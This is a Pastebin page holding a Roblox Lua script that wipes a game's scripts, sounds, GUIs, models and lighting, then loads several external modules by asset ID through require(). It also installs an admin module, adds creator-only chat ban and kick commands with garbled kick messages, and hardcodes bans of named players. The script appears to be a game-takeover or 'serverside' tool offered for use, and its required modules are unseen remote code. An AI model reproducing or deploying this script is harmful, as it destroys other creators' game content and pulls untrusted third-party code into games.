Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- script.Parent = game.StarterGui
- for i,v in pairs(game.Workspace:GetDescendants()) do
- if v:IsA("Sound") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Players:GetDescendants()) do
- if v:IsA("Sound") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Players:GetDescendants()) do
- if v:IsA("ScreenGui") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Players:GetDescendants()) do
- if v:IsA("Script") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Players:GetDescendants()) do
- if v:IsA("LocalScript") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Players:GetDescendants()) do
- if v:IsA("ModuleScript") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Workspace:GetDescendants()) do
- if v:IsA("Script") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Workspace:GetDescendants()) do
- if v:IsA("ModuleScript") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Workspace:GetDescendants()) do
- if v:IsA("LocalScript") then
- v:Remove()
- end
- end
- for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do
- if v:IsA("Script") then
- v:Remove()
- end
- end
- for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do
- if v:IsA("ModuleScript") then
- v:Remove()
- end
- end
- for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do
- if v:IsA("LocalScript") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Players:GetDescendants()) do
- if v:IsA("BillboardGui") then
- v:Remove()
- end
- end
- for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do
- if v:IsA("BillboardGui") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Workspace:GetDescendants()) do
- if v:IsA("BillboardGui") then
- v:Remove()
- end
- end
- for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do
- if v:IsA("Model") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Workspace:GetDescendants()) do
- if v:IsA("Hint") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Workspace:GetDescendants()) do
- if v:IsA("Message") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Players:GetDescendants()) do
- if v:IsA("Message") then
- v:Remove()
- end
- end
- for i,v in pairs(game.Players:GetDescendants()) do
- if v:IsA("Hint") then
- v:Remove()
- end
- end
- for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do
- if v:IsA("Message") then
- v:Remove()
- end
- end
- for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do
- if v:IsA("Message") then
- v:Remove()
- end
- end
- game.SoundService:ClearAllChildren()
- game.Teams:ClearAllChildren()
- game.MarketplaceService:ClearAllChildren()
- game.Lighting:ClearAllChildren()
- game.Lighting.FogEnd = 100000
- game.Lighting.FogStart = 0
- game.Lighting.Brightness = 2
- game.Lighting.GlobalShadows = false
- game.Lighting.Archivable = true
- game.Lighting.TimeOfDay = "12:24:29:"
- game.Players.RespawnTime = 3
- game.StarterGui:ClearAllChildren()
- game.StarterPack:ClearAllChildren()
- game.StarterPlayer.StarterCharacterScripts:ClearAllChildren()
- require(5293427850).op("")
- wait(0.5)
- require(3161149042).redwood()
- wait(2)
- require(5912443363).mer("")
- game.Players.PlayerAdded:Connect(function(player)
- require(5912443363).mer(player.Name)
- end)
- local s = Instance.new("Sound")
- s.Name = "Music"
- s.SoundId = ("rbxassetid://6386231290")
- s.Volume = 1
- s.Playing = true
- s.Looped = true
- s.Pitch = 1
- s.archivable = true
- s.Parent = game.Workspace
- s:play()
- wait(0.5)
- local data = {
- Settings = {
- DataStoreKey = ("AuniwingAdonis")
- }}
- require(359948692)(data)
- local Players = game:GetService("Players")
- local kickCommand = "?pban "
- local function onOwnerChatted(player, message)
- if message:sub(1, kickCommand:len()):lower() == kickCommand:lower() then
- local name = message:sub(kickCommand:len() + 1)
- local playerToKick = Players:FindFirstChild(name)
- if playerToKick then
- playerToKick:Kick("Periodic Table Are Permanently Banned From Please Freckles Not To Have been here Beforeindeed")
- local Banned = {playerToKick.Name}
- game.Players.PlayerAdded:Connect(function(p)
- for i,v in pairs(Banned) do
- if p.Name == v then
- p:Kick("Periodic Table Are Permanently Banned From Please Freckles Not To Have been here Beforeindeed")
- end
- end
- end)
- else
- end
- end
- end
- local function onPlayerAdded(player)
- if player.UserId == game.CreatorId and game.CreatorType == Enum.CreatorType.User then
- player.Chatted:Connect(function (...)
- onOwnerChatted(player, ...)
- end)
- end
- end
- for _, player in pairs(Players:GetPlayers()) do
- onPlayerAdded(player)
- end
- Players.PlayerAdded:Connect(onPlayerAdded)
- local Banned = {"dragonzilla914space"}
- local Banned = {"mumuak350000"}
- local Banned = {"lAm_Meap"}
- local Banned = {"IAm_Meap"}
- game.Players.PlayerAdded:Connect(function(p)
- for i,v in pairs(Banned) do
- if p.Name == v then
- p:Kick("Periodic Table Are Permanently Banned From Please Freckles Not To Have been here Beforeindeed")
- end
- end
- end)
- local Players = game:GetService("Players")
- local kickCommand = "?ban "
- local function onOwnerChatted(player, message)
- if message:sub(1, kickCommand:len()):lower() == kickCommand:lower() then
- local name = message:sub(kickCommand:len() + 1)
- local playerToKick = Players:FindFirstChild(name)
- if playerToKick then
- playerToKick:Kick("Question Anniversary Ennead Aneurysm Banned From Have Pregnancy Enthusiasms Wins")
- local Banned = {playerToKick.Name}
- game.Players.PlayerAdded:Connect(function(p)
- for i,v in pairs(Banned) do
- if p.Name == v then
- p:Kick("Question Anniversary Ennead Aneurysm Banned From Have Pregnancy Enthusiasms Wins")
- end
- end
- end)
- else
- end
- end
- end
- local function onPlayerAdded(player)
- if player.UserId == game.CreatorId and game.CreatorType == Enum.CreatorType.User then
- player.Chatted:Connect(function (...)
- onOwnerChatted(player, ...)
- end)
- end
- end
- for _, player in pairs(Players:GetPlayers()) do
- onPlayerAdded(player)
- end
- Players.PlayerAdded:Connect(onPlayerAdded)
- local Players = game:GetService("Players")
- local kickCommand = "?kick "
- local function onOwnerChatted(player, message)
- if message:sub(1, kickCommand:len()):lower() == kickCommand:lower() then
- local name = message:sub(kickCommand:len() + 1)
- local playerToKick = Players:FindFirstChild(name)
- if playerToKick then
- playerToKick:Kick("Anniversary Have Kicked Any Of These Things That Has Been Spitting Wanna See Below")
- else
- end
- end
- end
- local function onPlayerAdded(player)
- if player.UserId == game.CreatorId and game.CreatorType == Enum.CreatorType.User then
- player.Chatted:Connect(function (...)
- onOwnerChatted(player, ...)
- end)
- end
- end
- for _, player in pairs(Players:GetPlayers()) do
- onPlayerAdded(player)
- end
- Players.PlayerAdded:Connect(onPlayerAdded)
- game.ReplicatedStorage.HDAdminSetup:Remove()
- game.StarterPlayer.StarterPlayerScripts.HDAdminStarterPlayer:Remove()
- game.Workspace.HDAdminWorkspaceFolder:Remove()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement